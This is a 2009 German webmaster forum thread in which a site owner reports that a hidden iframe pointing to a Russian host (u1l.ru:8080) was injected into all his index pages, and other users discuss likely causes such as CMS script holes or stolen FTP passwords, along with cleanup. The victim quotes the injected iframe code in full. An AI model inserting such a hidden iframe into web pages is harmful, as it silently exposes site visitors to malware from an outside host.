scheisse gehackt!!

dominik1977 · : 18.06.2009 : 9

Hallo,

sag mal ich habe auf jeder index seite auf meiner webseite
folgenden code <iframe src="http://u1l.ru:8080/index.php" width=124 height=197 style="visibility: hidden"></iframe>

da war jemand aktiv bei mir... habe einen debug an 1und1 gesendet da jemand von dort aus aktiv war. Aber ich weiss nicht was ich machen kann Passwoerter sind so geaendert 8 stellig das es eigentlich sicher ist.!

mhh was will der auf meiner seite ??? Und was kann ich nun noch tun...

smilla · : 28.07.2008 : 161

Denke weniger das es an 1und1 liegt, sondern dass deine Script lücken haben, die Angreifer ausnutzen konnten.

mgutt · : 08.03.2005 : 3135

Scriptlücke oder Trojaner, der Dein FTP-Passwort geklaut hat.

» Adsense & Vibrant Alternative
» Ankauf von Communities und Forendomains

philophax · : 02.03.2005 : 336 : nahe Stuttgart 21

CMS?
Hatten wir letztes Jahr durch eine Erweiterung im Typo3.
Die sind rein, haben das adminpassword ausgespäht, alle index.htm* mit diesem Müll vollgespammt und ein kleines Prog (oder was auch immer - nicht meine Baustelle) dagelassen, das die Änderungen im Passwordbereich verschickt hat.
Wir haben alles vom Netz genommen und einen neuen Server aufgesetzt

PhiloPhax

dominik1977 · : 18.06.2009 : 9

ja cms...

wuerdet ihr nun das passwort aendern ich habe es schon letzte woche die sind trotzdem wieder rein .

philophax · : 02.03.2005 : 336 : nahe Stuttgart 21

http://www.abakus-internet-marketing.de/foren/viewtopic/t-54015.html#456597

PhiloPhax

ErwinRommel · : 14.09.2003 : 3571 : 39108 Magdeburg

Dann liegt es vermutlich an einer Scriptlücke und hat nichts mit dem FTP-PW zu tun. Nutzt du die aktuellste Version deines CMS?

Wir machen SEO!
Erfrischend ehrlich und schonungslos undiplomatisch!

dominik1977 · : 18.06.2009 : 9

habe nun mal was in php.ini verändert mal schauen ob nun ruhe ist!!
so ein scheiss auf allen index seiten und das sind 1000 seiten .....

JohnBi · : 22.02.2009 : 2962

Phase HTML Editor 5.0 - Dateiübergreifendes Suchen und Ersetzen, dann ist die Arbeit in genau 10 Sekunden erledigt ...

Probleme mit Google & Co.? Hier die Lösung! - Linktausch?! | Projekt kaufen?! |
-------------------------------------------
Der PostRank und das Anmeldedatum stehen in keinem Verhältnis zur Qualität der Antworten einiger User. {JohnBi, 2009}

dominik1977 · : 18.06.2009 : 9

mmmhhh das habe ich auch! Wie kann ich das machen John Bi???

dominik1977 · : 18.06.2009 : 9

kann man die dateien vom ftp server laden und dann den code via Dateiübergreifendes Suchen und Ersetzen entfernen?

e-fee · : 08.05.2007 : 3298

Nu ja, also wenn es ein CMS ist, dann liegen die Inhalte ja eh in einer Datenbank (da ist dann nix mehr mit Phase 5) - oder der Schadcode ist einer Datei des CMS quasi hardcodiert wie etwa ein Footer-Link, das ändert man dann genau EINmal.

JohnBi · : 22.02.2009 : 2962

3DCG · : 22.01.2006 : 545 : FFM

http://hosts-file.net/?s=77.37.19.173&view=matches

.

philophax · : 02.03.2005 : 336 : nahe Stuttgart 21

Bei uns damals waren das viele unterschiedliche Code-Schnipsel. Auch ca 1000 HTML-Seiten (einzeln von Hand ...) - und ein paar Typo3-Projekte. Da wars schlimmer, die haben wir auch einzeln und von Hand umgezogen. Neuer Server, alter Server vom Netz - und dann die Inhalte händisch neu eingepflegt. Dieser Müll-Code (iframe, php, javascript) steckte sogar in den Navigationpunkten vom Typo3 - und im Quelltext von .gifs - und natürlich in allen möglichen Datenbankinhalten.

PhiloPhax